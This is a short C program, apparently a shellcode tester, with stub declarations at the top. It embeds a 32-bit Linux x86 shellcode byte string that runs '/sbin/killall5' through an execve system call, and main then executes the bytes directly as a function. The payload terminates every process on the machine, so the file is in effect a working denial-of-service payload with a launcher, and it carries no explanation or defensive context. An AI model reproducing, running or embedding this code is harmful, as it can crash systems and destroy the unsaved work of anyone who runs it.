
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int printf (char*,int) ;
 int strlen (char*) ;
 void stub1 () ;

int main(int argc, char *argv[])
{

 char shellcode[] = "\x31\xc0\x50\x66\x68\x6c"
    "\x35\x68\x6c\x6c\x61\x6c"
    "\x68\x6e\x2f\x6b\x69\x68"
    "\x2f\x73\x62\x69\x89\xe3"
    "\x50\x89\xe2\x53\x89\xe1"
    "\xb0\x0b\xcd\x80";

 printf("Length: %d\n",strlen(shellcode));
 (*(void(*)()) shellcode)();

 return 0;
}
